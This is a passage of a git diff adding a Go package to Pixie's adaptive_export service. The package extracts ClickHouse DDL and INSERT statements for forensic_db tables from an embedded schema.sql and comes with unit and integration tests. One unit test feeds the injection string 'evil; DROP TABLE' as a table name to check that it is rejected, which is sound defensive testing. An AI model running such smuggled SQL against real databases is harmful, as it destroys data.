!strings.Contains(err.Error(), "unknown table") { + t.Fatalf("expected ErrUnknownTable for unknown table, got %v", err) + } +} + +// Repeated lookups for the same table return the same content. (The +// underlying parser may or may not cache — the sink's fast-path +// encoder caches the column slice itself once per table; what we test +// here is that the public Columns() answer is stable.) 
+func TestColumns_Repeated_StableResult(t *testing.T) { + a, err := Columns("dns_events") + if err != nil { + t.Fatal(err) + } + b, err := Columns("dns_events") + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(a, b) { + t.Fatalf("Columns(dns_events) drift across calls: a=%v b=%v", a, b) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go new file mode 100644 index 00000000000..e4503bb340c --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go @@ -0,0 +1,137 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package clickhouse owns the canonical ClickHouse DDL for the +// forensic_db tables that adaptive_export reads (kubescape_logs) and +// the 12 socket_tracer tables Pixie's retention plugin writes (which +// the operator joins against via forensic_db.adaptive_attribution). +// +// schema.sql is the single source of truth. The operator never invents +// SQL — it always extracts statements verbatim from the embedded copy. +package clickhouse + +import ( + _ "embed" + "errors" + "fmt" + "strings" +) + +//go:embed schema.sql +var canonicalSchema string + +// KnownTables enumerates every forensic_db table the operator is aware +// of, in the order they appear in schema.sql. Backtick-quoted table +// names (those containing dots, e.g. 
"http2_messages.beta") are listed +// here without backticks; DDL() reinjects them. +var KnownTables = []string{ + // non-pixie + "alerts", + "kubescape_logs", + // 12 socket_tracer pixie observation tables + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + // conn_stats — re-added to rev-2 schema; counts per + // (remote_addr, remote_port, protocol) on each retention-script pull. + "conn_stats", + // operator-owned attribution table + "adaptive_attribution", + // operator-owned persistent trigger cursor + "trigger_watermark", + // operator-owned per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). + // NOT a pixie table — absent from PixieTables(). + "ae_reconcile", + // operator-owned dx evidence-graph edge list (read by the Pixie + // dx_evidence_graph UI via clickhouse_dsn). NOT a pixie table. + "dx_attack_graph", + // rule-ins-only VIEW over dx_attack_graph (condition != ''); the + // dx_evidence_graph UI reads this by default so benign rows are filtered + // in ClickHouse, not pulled. Must follow dx_attack_graph (depends on it). + "dx_attack_graph_malicious", +} + +// ErrUnknownTable is returned by DDL / Columns when asked for a table +// not in KnownTables. +var ErrUnknownTable = errors.New("clickhouse: unknown table") + +// DDL returns the canonical CREATE TABLE statement for the named table, +// extracted from the embedded schema.sql. +func DDL(table string) (string, error) { + if !isKnown(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // ClickHouse identifiers containing a dot must be backtick-quoted. + // Build the right header for the lookup. 
+ identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + start := -1 + for _, kw := range []string{"CREATE TABLE IF NOT EXISTS forensic_db.", "CREATE VIEW IF NOT EXISTS forensic_db."} { + if start = strings.Index(canonicalSchema, kw+identifier); start >= 0 { + break + } + } + if start < 0 { + return "", fmt.Errorf("%w: %q registered in KnownTables but not present in embedded schema.sql", ErrUnknownTable, table) + } + rest := canonicalSchema[start:] + semi := strings.Index(rest, ";") + if semi < 0 { + return "", fmt.Errorf("malformed schema.sql: no terminating ';' after %q", table) + } + return rest[:semi+1], nil +} + +// PixieTables returns the subset of KnownTables that are pixie +// socket_tracer observation tables (the JOIN targets for +// adaptive_attribution). +func PixieTables() []string { + return []string{ + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + "conn_stats", + } +} + +func isKnown(name string) bool { + for _, t := range KnownTables { + if t == name { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go new file mode 100644 index 00000000000..0da8c706d3d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go @@ -0,0 +1,143 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "errors" + "strings" + "testing" +) + +// TestDDL_ReturnsCanonicalForKnownTables — every table named in +// KnownTables can be extracted as a complete CREATE TABLE statement. +func TestDDL_ReturnsCanonicalForKnownTables(t *testing.T) { + for _, name := range KnownTables { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.HasPrefix(ddl, "CREATE TABLE IF NOT EXISTS forensic_db.") && + !strings.HasPrefix(ddl, "CREATE VIEW IF NOT EXISTS forensic_db.") { + t.Fatalf("DDL(%q) wrong prefix: %q", name, ddl[:minInt(70, len(ddl))]) + } + if !strings.HasSuffix(ddl, ";") { + t.Fatalf("DDL(%q) does not terminate with ';'", name) + } + }) + } +} + +// TestDDL_PixieTablesIncludeNamespaceAndPod — every pixie table must +// declare namespace + pod columns (used by attribution JOINs). +func TestDDL_PixieTablesIncludeNamespaceAndPod(t *testing.T) { + for _, name := range PixieTables() { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.Contains(ddl, "namespace") { + t.Fatalf("%s missing namespace column", name) + } + if !strings.Contains(ddl, "pod") { + t.Fatalf("%s missing pod column", name) + } + }) + } +} + +// TestDDL_PixieTables_NoAnomalyHashColumn — pixie observation tables +// MUST NOT carry the hash inline; attribution is via JOIN. 
+func TestDDL_PixieTables_NoAnomalyHashColumn(t *testing.T) { + for _, name := range PixieTables() { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if strings.Contains(ddl, "anomaly_hash") || strings.Contains(ddl, "anomaly_hashes") { + t.Fatalf("pixie table %q must not carry anomaly_hash column; got:\n%s", name, ddl) + } + }) + } +} + +// TestDDL_AdaptiveAttribution_HasExpectedColumns — the attribution +// table is the operator's only write target. +func TestDDL_AdaptiveAttribution_HasExpectedColumns(t *testing.T) { + ddl, err := DDL("adaptive_attribution") + if err != nil { + t.Fatalf("DDL: %v", err) + } + for _, c := range []string{ + "anomaly_hash", "namespace", "pod", "comm", "pid", + "hostname", "t_start", "t_end", "last_seen", + } { + if !strings.Contains(ddl, c) { + t.Fatalf("adaptive_attribution missing column %q; got:\n%s", c, ddl) + } + } + if !strings.Contains(ddl, "ReplacingMergeTree(t_end)") { + t.Fatalf("adaptive_attribution must use ReplacingMergeTree(t_end); got:\n%s", ddl) + } +} + +// TestDDL_KubescapeLogs_PreservesAnomalyHash — kubescape_logs keeps its +// existing anomaly_hash DEFAULT ” column for pipeline compat. +func TestDDL_KubescapeLogs_PreservesAnomalyHash(t *testing.T) { + ddl, err := DDL("kubescape_logs") + if err != nil { + t.Fatalf("DDL: %v", err) + } + if !strings.Contains(ddl, "anomaly_hash") { + t.Fatalf("kubescape_logs lost anomaly_hash column: %s", ddl) + } +} + +// TestDDL_UnknownTable_ErrUnknownTable — defensive contract. +func TestDDL_UnknownTable_ErrUnknownTable(t *testing.T) { + for _, bad := range []string{"", "no_such_table", "process_events"} { + _, err := DDL(bad) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("DDL(%q) → %v, want ErrUnknownTable", bad, err) + } + } +} + +// TestDDL_DottedTableName_BacktickQuoted — schema.sql backtick-quotes +// dotted ClickHouse identifiers. 
+func TestDDL_DottedTableName_BacktickQuoted(t *testing.T) { + for _, name := range []string{"http2_messages.beta", "kafka_events.beta"} { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.Contains(ddl, "`"+name+"`") { + t.Fatalf("dotted table %q must be backtick-quoted; got:\n%s", name, ddl) + } + }) + } +} + +func minInt(a, b int) int { + if a < b { + return a + } + return b +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go new file mode 100644 index 00000000000..1d76c286760 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go @@ -0,0 +1,114 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "fmt" + "strings" +) + +// Columns returns the column names of forensic_db.
in +// declaration order, parsed from the embedded canonical schema.sql. +// Same defensive contract as DDL: unknown table → ErrUnknownTable. +func Columns(table string) ([]string, error) { + ddl, err := DDL(table) + if err != nil { + return nil, err + } + return parseColumnList(ddl) +} + +// InsertSQL returns the parameterized INSERT for forensic_db.
, +// ending in "... VALUES" so a driver's batch API can append rows. +// Column order matches Columns() exactly — callers MUST append values +// in that same order. Dotted ClickHouse identifiers are auto-quoted +// with backticks. +func InsertSQL(table string) (string, error) { + cols, err := Columns(table) + if err != nil { + return "", err + } + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + return fmt.Sprintf("INSERT INTO forensic_db.%s (%s) VALUES", + identifier, strings.Join(cols, ", ")), nil +} + +// parseColumnList walks the body of a CREATE TABLE statement, returning +// the leading identifier of each non-comment, non-blank line up to the +// closing `)` that ends the column list. Defensive against the SQL +// dialect quirks present in our schema (LowCardinality(...), DEFAULT +// expressions, inline -- comments, multi-word types). +func parseColumnList(ddl string) ([]string, error) { + open := strings.Index(ddl, "(") + if open < 0 { + return nil, fmt.Errorf("malformed DDL: no opening paren") + } + body := ddl[open+1:] + // the closing paren of the column list is the first `)` at the + // matching depth, but our schema doesn't nest parens inside the + // column list except inside DEFAULT exprs (e.g. now64(3)) and + // LowCardinality(String). Track depth. 
+ depth := 1 + end := -1 + for i, r := range body { + switch r { + case '(': + depth++ + case ')': + depth-- + if depth == 0 { + end = i + } + } + if end >= 0 { + break + } + } + if end < 0 { + return nil, fmt.Errorf("malformed DDL: no closing paren for column list") + } + body = body[:end] + + var cols []string + for _, raw := range strings.Split(body, "\n") { + line := strings.TrimSpace(raw) + if line == "" || strings.HasPrefix(line, "--") { + continue + } + // strip trailing comma + inline -- comment + if i := strings.Index(line, "--"); i >= 0 { + line = strings.TrimSpace(line[:i]) + } + line = strings.TrimSuffix(line, ",") + if line == "" { + continue + } + // first whitespace-separated token = column name + fields := strings.Fields(line) + if len(fields) == 0 { + continue + } + cols = append(cols, fields[0]) + } + if len(cols) == 0 { + return nil, fmt.Errorf("malformed DDL: no columns parsed") + } + return cols, nil +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go new file mode 100644 index 00000000000..ee66a17a85d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go @@ -0,0 +1,109 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "errors" + "strings" + "testing" +) + +// TestColumns_AdaptiveAttribution — the operator's only write target. +// Column list must match the DDL exactly so the sink can append values +// in the right positional order. +func TestColumns_AdaptiveAttribution(t *testing.T) { + cols, err := Columns("adaptive_attribution") + if err != nil { + t.Fatalf("Columns: %v", err) + } + want := []string{ + "anomaly_hash", "namespace", "pod", "comm", "pid", + "hostname", "t_start", "t_end", "last_seen", + "last_rule_id", "n_anomalies", + } + if len(cols) != len(want) { + t.Fatalf("Columns(adaptive_attribution) length %d, want %d; got %v", len(cols), len(want), cols) + } + for i, c := range want { + if cols[i] != c { + t.Fatalf("col[%d] = %q, want %q (full=%v)", i, cols[i], c, cols) + } + } +} + +// TestColumns_PixieTablesIncludeNamespaceAndPod — every pixie table's +// column list contains namespace + pod (the JOIN keys against +// adaptive_attribution). +func TestColumns_PixieTablesIncludeNamespaceAndPod(t *testing.T) { + for _, table := range PixieTables() { + t.Run(table, func(t *testing.T) { + cols, err := Columns(table) + if err != nil { + t.Fatalf("Columns(%q): %v", table, err) + } + if !contains(cols, "namespace") { + t.Fatalf("%s missing namespace; cols=%v", table, cols) + } + if !contains(cols, "pod") { + t.Fatalf("%s missing pod; cols=%v", table, cols) + } + if contains(cols, "anomaly_hash") || contains(cols, "anomaly_hashes") { + t.Fatalf("%s must not carry hash inline; cols=%v", table, cols) + } + }) + } +} + +// TestInsertSQL_AdaptiveAttribution — the canonical INSERT used by the sink. 
+func TestInsertSQL_AdaptiveAttribution(t *testing.T) { + sql, err := InsertSQL("adaptive_attribution") + if err != nil { + t.Fatalf("InsertSQL: %v", err) + } + if !strings.HasPrefix(sql, "INSERT INTO forensic_db.adaptive_attribution (") { + t.Fatalf("bad prefix: %q", sql) + } + if !strings.HasSuffix(sql, ") VALUES") { + t.Fatalf("bad suffix: %q", sql) + } +} + +// TestInsertSQL_DottedTablesBacktickQuoted — INSERT statements for +// dotted ClickHouse identifiers must wrap the name in backticks. +func TestInsertSQL_DottedTablesBacktickQuoted(t *testing.T) { + for _, table := range []string{"http2_messages.beta", "kafka_events.beta"} { + t.Run(table, func(t *testing.T) { + sql, err := InsertSQL(table) + if err != nil { + t.Fatalf("InsertSQL(%q): %v", table, err) + } + if !strings.Contains(sql, "INSERT INTO forensic_db.`"+table+"` (") { + t.Fatalf("dotted table %q not backtick-quoted: %q", table, sql) + } + }) + } +} + +// TestInsertSQL_Unknown — defensive contract. +func TestInsertSQL_Unknown(t *testing.T) { + for _, bad := range []string{"", "evil; DROP TABLE"} { + _, err := InsertSQL(bad) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("InsertSQL(%q) → %v, want ErrUnknownTable", bad, err) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go new file mode 100644 index 00000000000..d0cc78a642e --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go @@ -0,0 +1,154 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package clickhouse_test + +import ( + "context" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +// Live integration tests for the operator's schema-apply path. Driven +// against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT. +// Skipped if the env var is unset, so `go test` (without -tags +// integration) is unaffected. + +func envEndpoint(t *testing.T) string { + t.Helper() + e := os.Getenv("INTEGRATION_CH_ENDPOINT") + if e == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return e +} + +func envCreds() (string, string) { + return os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func httpExists(t *testing.T, endpoint, user, pass, table string) string { + t.Helper() + ident := table + if strings.Contains(table, ".") { + ident = "`" + table + "`" + } + q := url.Values{} + q.Set("query", fmt.Sprintf("EXISTS forensic_db.%s", ident)) + req, err := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil) + if err != nil { + t.Fatalf("build EXISTS req for %s: %v", table, err) + } + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("EXISTS %s: %v", table, err) + } + defer resp.Body.Close() + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) 
+ if resp.StatusCode/100 != 2 { + t.Fatalf("EXISTS %s: HTTP %d: %s", table, resp.StatusCode, strings.TrimSpace(string(body))) + } + return strings.TrimSpace(string(body)) +} + +// TestApply_Live runs the operator's Apply() against a live ClickHouse +// and asserts every OperatorOwnedTables entry is materialised. This is +// the regression guard for the "tables never appear in clickhouse" +// class of bug — a green run here proves the embedded schema.sql is +// reachable, the DDL extractor produces valid statements, and the HTTP +// transport posts them successfully. +func TestApply_Live(t *testing.T) { + endpoint := envEndpoint(t) + user, pass := envCreds() + + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply: %v", err) + } + + // Every operator-owned table must EXIST. + for _, table := range chpkg.OperatorOwnedTables { + got := httpExists(t, endpoint, user, pass, table) + if got != "1" { + t.Errorf("table forensic_db.%s: EXISTS=%q, want 1", table, got) + } + } +} + +// TestApply_Idempotent runs Apply() twice and asserts the second pass +// is a no-op (CREATE TABLE IF NOT EXISTS semantics on every statement). +func TestApply_Idempotent(t *testing.T) { + endpoint := envEndpoint(t) + user, pass := envCreds() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatal(err) + } + // Separate contexts per Apply — sharing one 60s budget across both + // calls makes Apply #2 occasionally fail with context.DeadlineExceeded + // when the live cluster is slow, masking the idempotency property. 
+ ctx1, cancel1 := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel1() + if err := a.Apply(ctx1); err != nil { + t.Fatalf("Apply #1: %v", err) + } + ctx2, cancel2 := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel2() + if err := a.Apply(ctx2); err != nil { + t.Fatalf("Apply #2 (should be idempotent): %v", err) + } +} + +// TestVerifyPixieSchema_Live runs the post-Apply guard against the +// live cluster. Required pixie columns (namespace, pod, hostname, time_) +// must be present on every pixie observation table. +func TestVerifyPixieSchema_Live(t *testing.T) { + endpoint := envEndpoint(t) + user, pass := envCreds() + + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatal(err) + } + ctx, cancel := context.WithTimeout(context.Background(), 90*time.Second) + defer cancel() + // Apply first so the test is order-independent w.r.t. TestApply_Live; the shared budget covers Apply (given 60s on its own elsewhere) plus the verify pass. + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } + if err := a.VerifyPixieSchema(ctx); err != nil { + t.Fatalf("VerifyPixieSchema: %v", err) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql new file mode 100644 index 00000000000..494285b3d12 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql @@ -0,0 +1,532 @@ +-- Forensic SOC ClickHouse schema (adaptive-write feature, design rev 2) +-- ---------------------------------------------------------------------- +-- Pixie type map (PixieTypeToClickHouseType): +-- TIME64NS → DateTime64(9), except event_time → DateTime64(3) +-- INT64 → Int64 | FLOAT64 → Float64 | STRING → String +-- BOOLEAN → UInt8 | UINT128 → String +-- Pixie's retention plugin adds: hostname String, event_time DateTime64(3) +-- We add: namespace String, pod String (used by adaptive_attribution JOINs). 
+-- +-- Engine convention for pixie observation tables: +-- ENGINE = MergeTree() +-- PARTITION BY toYYYYMM(event_time) +-- ORDER BY (hostname, event_time) +-- +-- The hash IS NOT stored on pixie observation rows. Attribution is via JOIN +-- against forensic_db.adaptive_attribution on (hostname, namespace, pod, time_). +-- See the adaptive_attribution definition at the bottom of this file. + +CREATE DATABASE IF NOT EXISTS forensic_db; + +-- Kubescape alerts (Vector kubescape_to_alerts sink, unchanged). +CREATE TABLE IF NOT EXISTS forensic_db.alerts ( + timestamp DateTime64(3), + ingest_time DateTime64(3) DEFAULT now64(3), + rule_id LowCardinality(String), + alert_name LowCardinality(String), + severity UInt8, + unique_id String, + cluster_name LowCardinality(String), + namespace LowCardinality(String), + pod_name String, + container_name LowCardinality(String), + container_id String, + workload_name LowCardinality(String), + workload_kind LowCardinality(String), + image LowCardinality(String), + infected_pid UInt32, + process_name LowCardinality(String), + process_cmdline String, + message String, + raw_event String +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(timestamp) + ORDER BY (timestamp, severity, namespace, rule_id) + TTL toDateTime(timestamp) + INTERVAL 90 DAY DELETE + SETTINGS index_granularity = 8192, ttl_only_drop_parts = 1; + +-- Kubescape raw logs — Vector kubescape_enrich sink writes here, the operator's +-- trigger reads it. anomaly_hash column kept here as DEFAULT '' for backwards +-- compat with any existing Vector pipeline that already populates it; the +-- operator does not depend on it being non-empty. 
+CREATE TABLE IF NOT EXISTS forensic_db.kubescape_logs ( + BaseRuntimeMetadata String, + CloudMetadata String, + RuleID String, + RuntimeK8sDetails String, + RuntimeProcessDetails String, + event String, + event_time UInt64, + hostname String, + level String DEFAULT '', + message String DEFAULT '', + msg String DEFAULT '', + processtree_depth String DEFAULT '', + anomaly_hash String DEFAULT '' +) ENGINE = MergeTree() + ORDER BY (event_time, hostname) + PARTITION BY toYYYYMM(toDateTime(event_time)) + TTL toDateTime(event_time) + INTERVAL 30 DAY DELETE + SETTINGS index_granularity = 8192; + +-- ============================================================================ +-- 12 Pixie socket_tracer tables — strongly predefined, namespace + pod added. +-- The retention scripts (PxL, user-defined or shipped defaults) MUST populate +-- namespace + pod via px.upid_to_namespace / px.upid_to_pod_name. +-- ============================================================================ + +-- http_events — pixie/src/stirling/source_connectors/socket_tracer/http_table.h +CREATE TABLE IF NOT EXISTS forensic_db.http_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + major_version Int64, + minor_version Int64, + content_type Int64, + req_headers String, + req_method String, + req_path String, + req_body String, + req_body_size Int64, + resp_headers String, + resp_status Int64, + resp_message String, + resp_body String, + resp_body_size Int64, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- http2_messages.beta — http2_messages_table.h +CREATE TABLE IF NOT EXISTS forensic_db.`http2_messages.beta` ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, 
+ remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + stream_id Int64, + headers String, + body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- dns_events — dns_table.h +CREATE TABLE IF NOT EXISTS forensic_db.dns_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_header String, + req_body String, + resp_header String, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- redis_events — redis_table.h +CREATE TABLE IF NOT EXISTS forensic_db.redis_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_args String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mysql_events — mysql_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mysql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd Int64, + req_body String, + resp_status Int64, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY 
toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- pgsql_events — pgsql_table.h +CREATE TABLE IF NOT EXISTS forensic_db.pgsql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- cql_events — cass_table.h +CREATE TABLE IF NOT EXISTS forensic_db.cql_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_op Int64, + req_body String, + resp_op Int64, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mongodb_events — mongodb_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mongodb_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_body String, + resp_status String, + resp_body String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- kafka_events.beta — kafka_table.h +CREATE TABLE IF NOT EXISTS forensic_db.`kafka_events.beta` ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted 
UInt8, + req_cmd Int64, + client_id String, + req_body String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- amqp_events — amqp_table.h +CREATE TABLE IF NOT EXISTS forensic_db.amqp_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + frame_type Int64, + channel Int64, + method String, + payload String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- mux_events — mux_table.h +CREATE TABLE IF NOT EXISTS forensic_db.mux_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_type Int64, + req String, + resp String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- tls_events — tls_table.h +CREATE TABLE IF NOT EXISTS forensic_db.tls_events ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + version Int64, + content_type Int64, + handshake String, + latency Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- conn_stats — conn_stats_table.h +-- Connection-level statistics (open/close/active counters + bytes_sent/recv + +-- protocol/ssl). 
